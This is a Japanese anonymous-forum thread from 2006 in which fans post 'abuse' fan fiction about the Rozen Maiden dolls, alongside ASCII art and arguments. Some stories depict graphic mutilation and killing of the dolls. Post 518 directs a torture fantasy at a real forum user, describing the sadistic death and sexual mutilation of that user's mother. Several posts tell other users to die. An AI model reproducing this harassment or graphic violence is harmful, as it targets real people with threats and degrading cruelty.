509 :名無しかわいいよ名無し:2006/03/01(水) 07:02:44 ID:aLd0FJSj
>>508
いいね〜
この世界でもっとも下辺にいるやつらの根底を覆した
書くならこういうの書けよ
猟奇的な幼児誘拐しそうな人達!
>>499
人間としての友人関係がなかったり社会で失敗ばかりしてるカスどもへ
人間できてねーからそうなるんだろ。
無駄に自然浪費スンナあほ
精神科病棟に強制収監されて新薬の実験台として散々使われて捨てられろ。
翠のよさが分からないからそんなことになるんだろ。
ピーチ・ピットに土下座して
「この人類のカス一同が作品をごめんなさい」
って言って最後はお前らがその姿勢のままダンプに引かれてミンチになれ
はっはっはなんて地球に優しいんだこの妄想は現実になると世界の人が喜ぶぜ!!!!!!



510 :名無しかわいいよ名無し:2006/03/01(水) 08:09:28 ID:bThhZ/Ll
>>508
  GJGJ!! 
  
  
  関係ないがなんかこのスレ身体を破壊する虐待が多いようだが、精神的な虐待のほうが良いに1票

511 :名無しかわいいよ名無し:2006/03/01(水) 09:45:31 ID:tZM3rtBC
>>509
君の卒業アルバムの落書きからの引用ですか?

512 :名無しかわいいよ名無し:2006/03/01(水) 12:26:12 ID:aLd0FJSj
さあね
とにかく氏ね


513 :名無しかわいいよ名無し:2006/03/01(水) 12:46:35 ID:WFtrt/yI

         \  /:.:/:.:.:/:.:.:.:.:.:.:.:.:.:.:.:.l:.:\ ヽ \
          ヽ/:.:.:/:.:.:/:.:.:.:.:.:.:.:.:.:.:/:./:/:.:.:.:.!ヽ ヽlヽ
            /:.:.:.:|:.:./:.:.:.:.:.:.:.:.:.:.:///:.:l:.:.:.:|:.:ヽ / l
.           |:.:.:.:..|ィ‐_-_、_. -///;ハ:.:|:.:.:.:!:.:.:.V   l
.           |l:.:.:.:.N r‐ァ-、` ̄  メ/‐-ヽ|、:.:|:.:.:.:|   _」
            ハ:.:.:.:l  弋:ソ  /´ ィ=‐、、\/:.:.:./-r ´
          /:.li \_\      ,   弋:ソ '´/:.:.:./:.:.:.l
.      __ /:.:.li   il、   , -- ‐、   _/:.:./:.:.:.:.:.!
     /´‐-、ト,:./:li ※ il:.:\ {__   }  ア ̄/l:.:.:.:.:.:l:.l   ケンカはやめやがれですーッ!!!
.   /  ‐-〈//li  il:.:.:.:.:.> 二ニ´ィ:li ※〃:.l:.:.:.:.:.:.l:l
   l  `ニ7'´: :.li   il ̄ ̄ _\ノヽ._l:li   il-lユ‐_-、:.:!l
  r‐l   |フ!: : にli  il〃 ̄  ィトK\  li  ilこ|ー‐  |:.:.:.l
  |〉l  イ _): :.にli※/ \///)l:l l:l ヽli. ilこ!|二  /:.:.:.:.:!
/>にLイ<:.:にli /´     //(!|:| L!==li※!こl./  /!:.:.:.:.:.:.l
丁L__|ーLノ:.:.:.にX      // )!|:|   ハ ilこ! l  /ヽl:.:.:.:.:.:.:l




514 :名無しかわいいよ名無し:2006/03/01(水) 13:02:39 ID:p5YiR8S6
http://www.imgup.org/iup170267.jpg
これの死体を翠星石に置換しよう。

515 :名無しかわいいよ名無し:2006/03/01(水) 13:43:16 ID:Ag+3x03A
(応用して使ってくれ)

自分の事をかわいいと思っている雛苺に作中における己のあり方の真相を思い知らせる為に、
顔面矯正処置を施してやる。
まず服の上から尻に成人男性と同量のホリゾンを注射して昏睡状態にさせる。
革製のベルトで小児用の寝台に固定、特に頭部を微動だにせぬよう慎重に調節。
顔面の素材に応じた特殊技能者を招聘し、工作機械もしくは薬剤等を用いて作業を展開。
日本の伝統工芸品である「ひょっとこ」の面貌に顔面を改造。

その後、全面がガラスで覆われた部屋に雛苺を移動させ、覚醒を待つ。
廊下には作業の成功を信じて待つジュンと巴。
覚醒した雛苺は己の変わり果てた姿を目の当たりにして号泣しながら逃げ惑う。
しかし、どこへ向かっても目の前には鏡の壁面があるのみ。自分自身から逃げる事は出来ない。
「雛、かわいいのおおおおおおおおおおおおおおおおおおおおおおおおおおおおっ!」
聞き覚えのある叫び声を耳にした二人が部屋に飛び込んで目にしたものは、フランス人形の衣装を
身に纏った小さな「ひょっとこ」一体。
「トゥモエ〜雛なの。私雛なの〜」
「ひょっとこ」に泣き叫びながら胸に飛び込まれ、ショックの余り失禁して気絶する巴。
「ぅうそだあっ!こんなのが雛苺なわけがないっ!」そう叫んで部屋を後にするジュン。
巴が別室に運び出され一人になった「ひょっとこ」顔の雛苺。
上下左右全面が鏡。目を開ければ飛び込んでくる「ひょっとこ」面の自分。逃れようのない真実。
「私はかわいい」という誤った自己認識だけで生きてきた雛苺が内面に相応しい風貌を「取り戻した」
今回の施術。
しかし、強情な自意識ゆえ自己の内外面の統合に失敗した雛苺は統合失調症を発症してしまう(発狂した)。

両親に説得され、泣く泣く見世物小屋への譲渡書にサインする巴。
これから雛苺は浅草でフランス人も含む外国人観光客を相手に「ひょっとこ踊り」をして生きてゆくのだ。
それが彼女にとって最も相応しい在り方なのだ。
雛苺は、顔面矯正を経て真の自分を取り戻した。


516 :名無しかわいいよ名無し:2006/03/01(水) 14:04:31 ID:X+6gtEiB
ほほう それでそれで?
     _____
    f:::::::::ヽ
    i::/" ̄ ̄ヾi
    |:| _ _|
    |r==( 。)( 。)
    ( ヽ  _) }
  __/ヽ ー== i
 r"ヽ t、 \___i
`/  i  ヽ__/
/ ヽノ j  j|ヽ
r⌒ヽ_/ /  /r |
{    ̄`-、_ヘ^ |


517 :名無しかわいいよ名無し:2006/03/01(水) 14:31:34 ID:g+kxQ/kp
好き嫌いがはっきり分かれる子だよな翠は
ウザく感じる人間にはほんといらない子

518 :名無しかわいいよ名無し:2006/03/01(水) 14:37:55 ID:Ag+3x03A
ID:8CDfFPM+の見ている目の前で、
ID:8CDfFPM+を産んだメスブタを50℃程度に加熱した牛馬の糞尿に叩き込んでやる。
即死せぬよう、故意に沸騰させぬのだ。(通常の浴槽温度は40℃以下)
水深1.7mの水槽でもがき苦しみ、糞尿を飲み込みながら悲鳴を上げるID:8CDfFPM+を産んだメスブタ。
「お願い、ママを助けてあげてえ〜」と失禁しながら泣き叫ぶID:8CDfFPM+の哀れな姿。
一時間程度かけて地獄の苦しみを味わった末死亡したID:8CDfFPM+を産んだメスブタ。
その状態で一週間放置。
充分に糞尿のしみ込んだ乳房と大陰唇を切除し、嗚咽するID:8CDfFPM+を押え付けて
強制的に給餌してやる。嘔吐したらそれを何回でも、何十回でも飲み込ませてやる。
しかし、この程度の懲罰ではID:8CDfFPM+の犯した悪業は決して赦される事はないのだ。


ID:8CDfFPM+を素っ裸後ろ手錠状態で、ヒルで満たしたドラム缶に叩き込んでやる。
夥しいヒルの群れが全身のみならず耳、鼻、口、目、泌尿器などあらゆる器官に吸い付き、
ID:8CDfFPM+を苛む事だろう。己の犯した罪業の深さを悔いながら全身の血を吸い取られ、
阿鼻叫喚の苦しみを存分に味わいながら絶命するがよい。


519 :名無しかわいいよ名無し:2006/03/01(水) 14:54:34 ID:X+6gtEiB
ほほう それでそれで?
     _____
    f:::::::::ヽ
    i::/" ̄ ̄ヾi
    |:| _ _|
    |r==( 。)( 。)
    ( ヽ  _) }
  __/ヽ ー== i
 r"ヽ t、 \___i
`/  i  ヽ__/
/ ヽノ j  j|ヽ
r⌒ヽ_/ /  /r |
{    ̄`-、_ヘ^ |


520 :名無しかわいいよ名無し:2006/03/01(水) 17:20:48 ID:aLd0FJSj
ID:8CDfFPM+って誰だよ。
かなり酷だな

521 :名無しかわいいよ名無し:2006/03/01(水) 18:59:30 ID:SS8cA2+6
>>491のつづき
「翠星石の足がぁーーーー!」
床に吐き出されたかつての体の一部だったものを見て翠星石は絶叫した。
「本当に活きが良いなw」
そうゆうと人間は自身のポケットに手をつっこみ何かを取り出そうとしている。
「こ、今度を何をしやがる気です!」
涙と鼻水でぐしゃぐしゃになった顔で精一杯の強がりを言ってみせる。
「きったねぇ顔。まぁどうでもいいけど」
そういうと人間は黄色いものがつまったチューブをとりだした。
「これって・・・」
翠星石がひきつった表情でたずねた。
「はぁーい、からしですぅよw」
人間は笑顔でそれにこたえた。
「いやです、やめてですぅ!」
チャリン チャリン チャリン チャリン
これからされることを想像し翠星石は身をくねらせ激しく抵抗した。倉庫内に鎖の音が響き渡る。
ガシッ
しかし、所詮は人形。人間の力にかなうわけもない。
「これでどれだけおいしくなるかなぁw」
人間はチューブの先端を右ひざに当てた。ちょうどさきほどひきちぎったところに。
「お願いです。これからは態度をあらためるです。だから許しやがれですぅ!」
「立場わかってねぇw」
ニュル ニュル ニュル ニュル
容赦なくチューブからからしがひねり出される。
「ヒギャァァァァァァァァァァァァァァッ! 痛いです! しみるです!」
「これじゃ、翠星石の踊り食いだなw」
ガブリ
翠星石のふとももに人間がかぶりつく。
「アァァァァァァァァァァァ! やめるです! 痛いです! デブ人間の癖に生意気ですぅ!」
                                        つづく

522 :名無しかわいいよ名無し:2006/03/01(水) 19:03:30 ID:SS8cA2+6
>>505
期待して待ってるね
>>508
虐待スレだからいいんじゃない?
>>510
書いてみては?

523 :名無しかわいいよ名無し:2006/03/01(水) 19:04:34 ID:X+6gtEiB
ほほう それでそれで?
     _____
    f:::::::::ヽ
    i::/" ̄ ̄ヾi
    |:| _ _|
    |r==( 。)( 。)
    ( ヽ  _) }
  __/ヽ ー== i
 r"ヽ t、 \___i
`/  i  ヽ__/
/ ヽノ j  j|ヽ
r⌒ヽ_/ /  /r |
{    ̄`-、_ヘ^ |


524 :名無しかわいいよ名無し:2006/03/01(水) 21:09:04 ID:XjL6BYDR
問題はこのスレ見てたら勃起してきた事なんだが

525 :名無しかわいいよ名無し:2006/03/01(水) 22:09:40 ID:+ftACPxb
ほほう(ry

526 :名無しかわいいよ名無し:2006/03/01(水) 22:31:53 ID:BdPpE+l/
(改訂版)
自分の事をかわいいと思っているクソ雛苺に作中における己のあり方の真相を思い知らせる為に、
顔面矯正処置を施してやる。
まず服の上から尻に成人男性と同量のホリゾンを注射して昏睡状態にさせる。
革製のベルトで小児用の寝台に固定、特に頭部を微動だにせぬよう慎重に調節。
顔面の素材に応じた特殊技能者を招聘し、工作機械もしくは薬剤等を用いて作業を展開。
日本の伝統工芸品である「ひょっとこ」の面貌に顔面を改造。

その後、全面が鏡で覆われた部屋にすやすや眠るクソ雛苺を移動させ、覚醒を待つ。
廊下の長椅子には作業の成功を信じて待機するジュンと巴。
覚醒したクソ雛苺は己の変わり果てた姿を目の当たりにして狂ったように号泣しながら逃げ惑う。
しかし、どこへ向かっても目の前には鏡の壁面があるのみ。自分自身から逃れる事は出来ない。
「雛、かわいいのおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおっ!」
聞き覚えのある叫び声を耳にした二人が部屋に飛び込んで目にしたものは、フランス人形の衣装を
身に纏った小さな「ひょっとこ」一体。
「トゥモエ〜雛なの。私雛なの、わかるでしょ? 雛なのよ」
「ひょっとこ」に泣き叫びながら胸に飛び込まれ、ショックの余り失禁して気絶する巴。
「ぅうそだあっ!こんなのが雛苺なわけがないっ!」憤然とそう叫んで部屋を後にするジュン。
巴が別室に運び出され一匹になった「ひょっとこ」面のクソ雛苺。
上下左右全面が鏡。目を開ければ飛び込んでくる「ひょっとこ」面の自分。逃れようのない真実。
「私はかわいい」という誤った自己認識だけで生きてきたクソ雛苺が醜い内面に相応しい風貌を
「取り戻した」 今回の施術。
しかし、極めて強情な自我ゆえ内外面の一体化に失敗したクソ雛苺は人格崩壊を来たしてしまう。
クソ雛苺は「ひょっとこ面の己」の受容を頑なに拒み、発狂という痛ましい事態を自ら招いたのだ。

両親に説得され、泣く泣く見世物小屋への譲渡書にサインする巴。
これから雛苺は浅草でフランス人も含む外国人観光客を相手に、絶望と激しい失意のどん底の中で
「ひょっとこ踊り」をして生きてゆくのだ。仮にクソ雛苺自身が激しく精神的に拒み続けようとも。
それがクソ雛苺にとって最も相応しい在り方なのだから。
クソ雛苺は、顔面矯正とそれに伴う葛藤を経てその内面に相応しい自己へと還元されたのだ。
すなわち、「笑いもののちんちくりん人形」である。

527 :名無しかわいいよ名無し:2006/03/01(水) 22:46:21 ID:X+6gtEiB
ほほう それでそれで?
     _____
    f:::::::::ヽ
    i::/" ̄ ̄ヾi
    |:| _ _|
    |r==( 。)( 。)
    ( ヽ  _) }
  __/ヽ ー== i
 r"ヽ t、 \___i
`/  i  ヽ__/
/ ヽノ j  j|ヽ
r⌒ヽ_/ /  /r |
{    ̄`-、_ヘ^ |


528 :名無しかわいいよ名無し:2006/03/01(水) 23:27:23 ID:wFvfxR1l
自己愛性人格障害の奴らに効きそうだなこのコピペ

529 :名無しかわいいよ名無し:2006/03/01(水) 23:46:25 ID:p5YiR8S6
いい加減アンチウザいよ。
個人の趣味をあんたらに否定される筋合いはない。

530 :名無しかわいいよ名無し:2006/03/01(水) 23:51:04 ID:aLd0FJSj
ここの住人はミンチになっちまえ
正直キモ過ぎだし勃起っておい
「悪魔が取り付いたんです」みたいな感じで、あのペルー人と同じことしそう。
消えろ消えろ駅エロ消えろ消えろ消えろ消えろ消えろ消えろ消えろ消えろ消えろ消えろ


531 :名無しかわいいよ名無し:2006/03/02(木) 00:03:22 ID:FsCdGSgb
>>530
お前がここの住人を嫌いなのは分かった。
だが、大事なことを忘れている。
同じ人間など一人もいない、わかるか?
自分の価値観のみを無理やり他人に押し付けるな。
分かったら二度とくるなよ?

532 :名無しかわいいよ名無し:2006/03/02(木) 00:08:09 ID:htKG9l9O
再来

533 :名無しかわいいよ名無し:2006/03/02(木) 00:40:50 ID:D1I8gKyL
ところでおまいらはこれ買う?
http://www.earlbox.sakura.ne.jp/ph/060227e.jpg

534 :名無しかわいいよ名無し:2006/03/02(木) 01:14:15 ID:PBQf09qu
>>533
ネタ?まじだったらスゲー商売してるなw
ユージンのフィギア再販無しってことを聞いて俺はもう

535 :名無しかわいいよ名無し:2006/03/02(木) 01:21:57 ID:D1I8gKyL
>>534
アニメイトの通販で買えるよ

536 :名無しかわいいよ名無し:2006/03/02(木) 02:09:33 ID:PkBOgH4G
さんざこのスレ荒らしてる>>509もなんだかんだ言って翠星石虐待が大好きなようだ。

よりにもよってリアルに病んでる>>508を気に入るとはw

>>508は旦那の束縛がすごくてパートにも出られず、暴力ふるわれてるにもかかわらず、
奥さんの方は自分に「自分がいないとあの人は孤独になるから」と言い聞かせ悪化していく
典型的な ド メ ス テ ィ ッ ク バ イ オ レ ン ス ( 家 庭 内 暴 力 )

を翠星石虐待に置き換えただけ。


>>509はこういうリアルな虐待が好きなんだなww

537 :名無しかわいいよ名無し:2006/03/02(木) 05:19:40 ID:MmOvRhDd
「チビ人間〜のりはどこですぅ?」
「あ?姉ちゃんは合宿で2,3日帰ってこないけど?」
「そ、それは困るですぅ〜!さっき食べたお昼のハンバーグのソースを服にこぼしてしまったのです!
 このままじゃ翠星石の大事な服にシミがついてしまうのです!」
「洗えばいいだろ?」
「チビ人間命令するです、翠星石の服をとっとと洗いやがれですぅ」
「お前な、それくらい自分でやれよ洗濯機回すことくらい雛苺だってできるぞ」
「う...ふ、ふん、考えても見れば翠星石の大切な服をこんなヒキコモリのチビメガネに託したら
 それこそ手垢まみれのヲタ臭まみれにされてしまうです!」
「な、なんだとー!?!」

洗濯機の前で服を脱ぐ翠星石
「しくじったです、チビを怒らせたから自分でやるしかなくなったのです。
 しゃーねぇから自分でやるです。え〜と...洗剤を入れて<全自動洗濯+乾燥>のところを押すですね?」
(ピッ)ウィィィーン...ゴトゴト
「これで完了ですぅ♪あとは終わるのをまつだけですぅ!翠星石にかかればこのくらいどーってことないのですぅ!」

数十分後

「ひっ?!ぎゃああああああああああああああああああああああ〜〜〜〜〜〜ああああっつっつ!!!」

「お、おいどうした?何騒いでんだよ?」
「す、すすすすす翠星石の、翠星石の大切なふ、ふ、服が、服が〜〜〜〜っ!?
 つつつつ、つ、つんつるてんのすってんてんのミニサイズになってるですぅ〜〜〜〜!!!!
 ど、どどど、どういうことですかぁぁっぁっぁあぁぁ???!!!!」

「あ〜あ、お前、柔軟剤入れないで洗って乾燥機回したろ?バーカ」
「ひぃぃいぃぃっ!そんなそんなですぅ〜〜〜翠星石はこれしか服を持ってねぇのですぅぅぅ!!!」




538 :名無しかわいいよ名無し:2006/03/02(木) 05:26:02 ID:PBQf09qu
wktk!!(o゚▽゚)o

539 :名無しかわいいよ名無し:2006/03/02(木) 05:49:07 ID:MmOvRhDd
「どどどど、どうすればいいのですか?この服はこの服はお父様が翠星石のためにしつらえてくれた
 世界にたった一着しかない翠星石の いっちょうら なのですぅ...
 これが無かったら翠星石は一生このまま下着姿なのですぅ〜」

「柔軟剤を入れたぬるま湯で手もみ洗いすれば何とかなるかも」
「チビ人間、わかってるならとっととやりやがれです!まったくてのかかるヒッキーです。
 翠星石が言わないと何もできやしないのです!!」
「な、なんだとー?!!!」

「うぅ...またミスったです...チビをまたおこらせてしまったです...
 しゃーねぇから、また自分でやるのです...
 えーと柔軟剤...このボトルですね?これをぬるま湯で注いで(ゴポゴポ...)
 優しく手もみ洗いをするのです...(じゃぶじゃぶ、もみもみ)
 洗濯くらい翠星石にかかればお茶の子さいさいチョロいもんですよ♪さっきはちょっと調子がくるっただけなのです、
 翠星石にやってやれないことはねぇ〜のです!」

数十分後

「ひっ?!ぎゃうえうぼぁああああああああああああああああ〜〜っあああぁっぁっぁあっつ!!!!!」

「今度はどうした?!」
「すす、すー...すー...す、す、翠星石の翠星石の大事な大事な いっちょうら がぁっぁぁぁっぁ!!?!?!
 みみみみ緑色だった、す翠星石のふふふ服が、オレンジと白と変な黄色と黒のまだら模様になってるですぅうううぅううぅ!!!??
「どどどおど、どど、どういうことですかぁぁあぁぁあぁあ?!!??!
 いやああああああああっ!!!翠星石の いっちょうら がぁぁあぁぁぁぁああああ嗚呼ぁぁ〜???!?」

「あ〜あ、お前これ柔軟剤じゃなくて漂白剤だぞ?色が抜けて変色しちゃったんだ。うわこりゃダメだ、捨て捨て!」
「そそそそそそんなぁぁぁぁ〜〜〜翠星石の服はこれしかないですよぉぉぉ??!
 チビにんげ...ジュ、ジュン!直して!直してほしいのですぅ!翠星石の大事な、いっちょうら をっ!!」
「あ〜そりゃ無理」
「なななな何でですかぁっぁ?!真紅の服は直したじゃないですかぁっぁ!!」
「いや、裁縫はできるけど、全部直すのは無理だって」
「そんなぁぁぁああああああああ!!!翠星石は、これ一着しかないんですよぉおぉぉ!!!ひぃいぃぃいぃ〜〜っ!!!」

エピローグ
下着姿でジュンのパソコンの前で涙ぐむ翠星石
「どうだ?ヤ〇オクに出品されてたドールサイズのグリーンベルベット(翠星石の服に似てるやつ実際出品されてる)
 落札できたか?」
「あぅぅぅぅ...ダメですぅ...何度やってもこのオークションID:micchan に競り負けてしまうのですぅぅぅ...うううっ」

END

540 :名無しかわいいよ名無し:2006/03/02(木) 06:15:40 ID:YptjnM/H
オクidワロテシモwww

541 :名無しかわいいよ名無し:2006/03/02(木) 06:25:55 ID:PBQf09qu
>>539
ワラタww 
近年まれにみる良作だった!
朝から良いもの読ませてもらいましたw(人∀`

542 :名無しかわいいよ名無し:2006/03/02(木) 09:03:25 ID:O75noslH
(*^ー゚)b グッジョブ!!

543 :名無しかわいいよ名無し:2006/03/02(木) 09:26:26 ID:/Zd3qemq
>537,539
自業自得なとこがいいなww
面白かった
GJ!


544 :名無しかわいいよ名無し:2006/03/02(木) 10:15:26 ID:xWl1y/w1
こうゆうのはこうゆうので面白いな!GJ!
まぁなんだ、例のアンチのせいで色々押さえて書いてる人も居るんだろうが
こうゆう傾向のもこの先増えるならまぁ俺的には結果オーライかも…。

545 :名無しかわいいよ名無し:2006/03/02(木) 11:20:59 ID:8XJHnWBm
>>530
卒業写真の裏にでも書いてろ

546 :名無しかわいいよ名無し:2006/03/02(木) 11:29:28 ID:rFU/3paw
いいねいいねー
最近なんだかんだいって盛り上がってるよww

547 :名無しかわいいよ名無し:2006/03/02(木) 12:11:39 ID:htKG9l9O
>>537
このスレの中で最も面白く、楽しく見れた。
100点中九十点   GJ!
>>544と同意で、こんな感じの物が増えて欲しい。

この季節、アンチへの卒業〜〜〜しろよがえしが流行りそうだな

548 :名無しかわいいよ名無し:2006/03/02(木) 12:33:12 ID:PkBOgH4G
>>539
またほのぼの系かと思ったら、オチのオクIDで吹いたww

相手に悪意が無いだけに余計にタチ悪ぃww


549 :名無しかわいいよ名無し:2006/03/02(木) 12:55:09 ID:htKG9l9O
>>548
俺も俺も!!!


550 :名無しかわいいよ名無し:2006/03/02(木) 13:42:15 ID:1ka5v17P
アンチのせいで何かと変なのが増えた気が

551 :名無しかわいいよ名無し:2006/03/02(木) 18:31:27 ID:zyxBV2TV
どうやらあちこちで、このスレ曝されてるっぽいね
もともとは知る人ぞ知るスレだったはずで、見つかっても肌に合わない奴らは
入ってこなかったし。色んなRM関連スレから愉快犯的な奴らとか
真性のこんなのはファンとして許せん厨とかが変な正義感振りかざすようになったんだろ。
難民板にでも引っ越すか?

552 :名無しかわいいよ名無し:2006/03/02(木) 19:48:15 ID:MmOvRhDd
某所で見た下着姿で「のりに服を洗われちまったですぅ」ってごちる翠星石のイラストを見て
そういや翠星石は原作やアニメで自分で「お掃除・お料理」してるけど「お洗濯」は無かったなぁ...って思って、
で、『服』とくればオチは『あの人』だろう!と勢いで書いたんだけど、予想以上にウケてるなぁ。

翠星石はなんかこう、いじりがいがあるっていうか、いぢめたくなっちゃうキャラなんだよね。









553 :名無しかわいいよ名無し:2006/03/02(木) 19:52:05 ID:D1I8gKyL
>>552
禿堂&GJ!!

554 :名無しかわいいよ名無し:2006/03/02(木) 22:04:01 ID:D1I8gKyL
思春期の男子は好きな女子にちょっかいを出したがるだろ
翠ちゃん虐待はそれと同じさ

555 :名無しかわいいよ名無し:2006/03/03(金) 03:24:19 ID:TAc9hYt0
軽い気持ちでやるいじり(イジメとは少し異なる)ならまあ許容範囲という人は多いんじゃないと言ってみる
体ぶっ壊すとかそういうのは上級者向けかと

556 :名無しかわいいよ名無し:2006/03/03(金) 03:24:28 ID:siTagWeP
なんだこれ!?全部>>1の自演か?

557 :名無しかわいいよ名無し:2006/03/03(金) 03:38:05 ID:kMHkKnl9
翠星石をジャンクにしてやったぜwww
http://kjm.kir.jp/pc/?p=18576.jpg

http://kjm.kir.jp/pc/?p=18577.jpg

頭破壊
http://kjm.kir.jp/pc/?p=18578.jpg

とれた頭
http://kjm.kir.jp/pc/?p=18579.jpg


翠ちゃんとテレカ
http://kjm.kir.jp/pc/?p=18580.jpg

翠ちゃんの顔アップ
http://kjm.kir.jp/pc/?p=18581.jpg

558 :名無しかわいいよ名無し:2006/03/03(金) 03:42:26 ID:Yk/Ln2E7
>>554
思春期じゃない変な年齢で書き込んでるのも絶対いる

559 :名無しかわいいよ名無し:2006/03/03(金) 13:04:49 ID:iW8eRwbm
>>558
おまえのことかww?

560 :名無しかわいいよ名無し:2006/03/03(金) 14:30:27 ID:Yk/Ln2E7
想像に任せる

561 :名無しかわいいよ名無し:2006/03/03(金) 22:38:30 ID:dYu/1sDu
ほのぼのも良いけど、
そろそろ、ゆるい虐待が欲しいとこ。

562 :名無しかわいいよ名無し:2006/03/04(土) 01:25:40 ID:wS4s5b4M
さて!二期で薔薇水さまに一目惚れて銀党員をやめた漏れがきましたよ
仕事が終わったらハードな物理/精神虐待系を投下するぜ
翠だけはどーしても好きになれねえ。観ているとムッツとする
あんなのがラムペ様などと同列なのは許せねえ 
Yhuオクでユージンフィグアに1万円以上競ってる連中の気が知れねえ

563 :名無しかわいいよ名無し:2006/03/04(土) 01:58:55 ID:sY1nJECt
>>561
IDがデュード

翠にとって精神的にショッキングなことが起こるのがみたい

564 :名無しかわいいよ名無し:2006/03/04(土) 02:52:42 ID:t8soxX9P
1stデュード

565 :名無しかわいいよ名無し:2006/03/04(土) 07:07:52 ID:TIMFfj56
>>562
健闘を祈る

566 :名無しかわいいよ名無し:2006/03/04(土) 19:16:51 ID:gkkP7B6t
5分以内にレスが無かったら翠星石は俺の嫁

567 :566:2006/03/04(土) 19:41:01 ID:gkkP7B6t

      ∧_∧
     ( ´∀` )  それじゃあ翠星石はもらって行きますよ
     /⌒   `ヽ
    / /   ノ.\_M
    ( /ヽ    |\___E)
    \ /   |  _/ \_
      (   _ノ |/  __ \
      |   / /| く/',二二ヽ>|
      |   / /|  |l |ノノイハ)) |
      |  / / |  |l |#゚д゚ノl| | <放しやがれ!
      (  ) ) | ノl⊂_介」つ| |   こんちくしょー!ですぅ
      | | /  | ≦ノ`ヽノヘ≧ |
      | | |  |ミく二二二〉ミ|
     / |\\  ̄ ̄ ̄ ̄ ̄ ̄
     ∠/

568 :名無しかわいいよ名無し:2006/03/04(土) 20:09:40 ID:0aJAwH2J
待て。貴様の好きにはさせん。
   ∧_∧
   (´∀`)
  /⌒  ~`)
 ( くノ | イ
  ヽ_ァ  , |
   ノヽ_λ_ )
  /  ノ| ノ
  ( -く |ー(
  \ └| 丿
   ,┘/(_)

569 :名無しかわいいよ名無し:2006/03/04(土) 20:13:56 ID:gkkP7B6t
>>568
   ∧_∧  / ̄ ̄ ̄ ̄ ̄
  ( ´∀`)< やるのか?
  (    )  \_____
  | | |
  (__)_)


570 :名無しかわいいよ名無し:2006/03/04(土) 20:23:45 ID:k5Xe1rkz
「う、どこだここは?延髄がいてえ・・・」
目が覚めたデュード。
「ん?なんでベッドの上なんだ?頭に包帯巻かれてるしわけわかんねえ。ん?手紙?」
どうやら彼はなぜ寝ていたのかわからないらしい。とりあえず隣の棚の上に置かれた手紙を開けてみる。
「ふん、なになに『お前みたいなやつはクズです!さっさと死にやがれです!虐待セットは処分してやったです!あ、可哀想だから包帯くらいは巻いてやったです! 翠星石』」
ふと考え始めるデュード。
「なにしたんだっけなあ俺・・・お、そうだ!あのクソ人形に隙をついて頭をどつかれたんだ。いてえ・・・」
とりあえず彼はベットから起き上がり、引き出しを漁る。
「あった。これこれ。主人を侮辱した罪は体で償ってもらうぜ翠星石!」
引き出しからナタとデザートイーグルを取り出すと、家を後にした。
彼は町から人里離れた所にトレーラーハウスを設置し、暮らしていた。
その為翠星石が逃げ出すのは容易ではなく、また強力な火器を使ってもバレないという都合の良い所だった。
「まいったなあ。車がイカれてやがる。歩いて探すしかねえか。だがこんなこともあろうかと翠星石には発信機を設置しておいたぜ」
小型のレーダーを取り出し翠星石の位置を確認する。
「ふむふむ。結構離れてるな。位置からしてジュンってやつの家か。よっしゃ!気合入れていくぜ!」

571 :名無しかわいいよ名無し:2006/03/04(土) 20:24:01 ID:0aJAwH2J
ああ。そのつもりだ。
     ∧_∧
    _(´Д`)
   /    )
∩  / ,イ 、 ノ/
|| / / |  (<
|| || |   }
|| || ヽ ヽ
||ニ(i、)  \ \
∪    / ヽ )
    / / { |
   /_/ | L
   ヽ_ヽ〈__ゝ

572 :名無しかわいいよ名無し:2006/03/04(土) 20:39:46 ID:k5Xe1rkz
「っち、いつきても人ごみは慣れねえぜ。まあいい。とりあえず隠し倉庫へ行くか」
彼は人を避けるような路地へ行った。その先には扉がある。鍵はかかっていないようだ。
「お、しばらく使ってなかったがまだ大丈夫みたいだな」
中にはカマやスレッジ、クワなどが大量に置かれていた。彼はその中のカマに手を取った。
「さあ翠星石。お前のところへ死神デュード様がお出迎えだぜ・・・」
 しばらく歩いていくうちに翠星石の反応地点まで近づいたデュード。
「ここがジュンってやつの家だな。ちょっとお邪魔するぜ」
いきなり玄関のドアを蹴り飛ばすデュード。
「おーい、翠星石!いないのか?」
返事は返ってこない。
「こうなりゃ力づくで持ち帰るしかねえか。どうせ隠れてるんだろ。どうせ怖いんだろ!」
リビングへのドアを蹴り飛ばす。誰もいない。だが彼はテーブルの上の暖かいスープを不思議に思った。
「人がいないのにこんな湯気の出たスープがあるはずねえ・・・隠れてるのはわかってんだぜ翠星石!」
再び廊下に出て叫ぶ。
「出てこねえならてめえの姉妹から殺していくぜ!」
「あなたが翠星石を苛めていた人ね」
と、後ろから声が聞こえたので振り返ると、そこには赤い服を着た人形が立っていた。
「私の姉妹をこんな目に会わせるなんて覚悟・・・」
ッグシャ!その人形の頭は砕け散った。
「ああ?ゴタゴタうるせえよ!クズが!」
そこに金髪の幼女体系の人形が歩み寄る。
「あーん、真紅〜」
ッグシャ!再びデュードのスレッジが飛び、人形の首が砕け散る。
「っひっひっひっひ!快感だぜえ!おら翠星石!お前の姉妹は二人とも粉々だ!直して欲しけりゃ出て来い!俺はマエストロ超えた神様だからよお!」

573 :名無しかわいいよ名無し:2006/03/04(土) 21:18:23 ID:XdMDOlNW
「う〜...頭ガンガンするです...昨日の雛祭りで白酒飲みすぎたです...
 洗面所で顔を洗って気分をすっきりさせるのですぅ...(じゃぶじゃぶ)
 ん、なんだチビ人間、お前も今頃のこのこ起きてきたですか、まったくいい気なもんです」

「!ッ(///)...」
パタパタ...バタン!

「なっ!?ちょ、朝っぱらから翠星石を無視して出て行くとは、チビのくせに生意気ですぅ!少しヤキを入れてやるですぅ!
 (ぐぅぅぅぅぅ...) (///)その前に腹ごしらえをしておくかですぅ...」
ガチャ
「おはようですぅ♪」
「......」
「お、おはよう...す翠星石ちゃん...」
「ん?どうかしたですか?」
「え?いや、う、ううん、なんでもないのよ翠星石ちゃん、ね、ねぇ真紅ちゃん?」
「そうね、のり」
「...チビといい二人といい、なんかよそよそしいのですぅ、感じわるいのですぅ」
「あ、その〜なにから言ったらいいの〜??」
「知らないほうが良いこともあるのだわ」
「うう〜なんか今日はみんな様子が変なのです、チビといい真紅といい のりといい翠星石を見る目がいつもと違うのです!
 いったい昨日なにがあったのですか?翠星石は何も覚えてないのですぅ!!」
ガチャ
「あ、チビ人間!さっきはよくもこの翠星石を無視してくれやがったですね?!そこになおれです!成敗してくれるです!」
「...(///)」
パタパタ...バタン
「あ、ちょっとチビ!きぃぃぃぃぃぃっ!また翠星石を無視したのですぅ!」
「無理もないわ、あんなことがあったばかりだし」
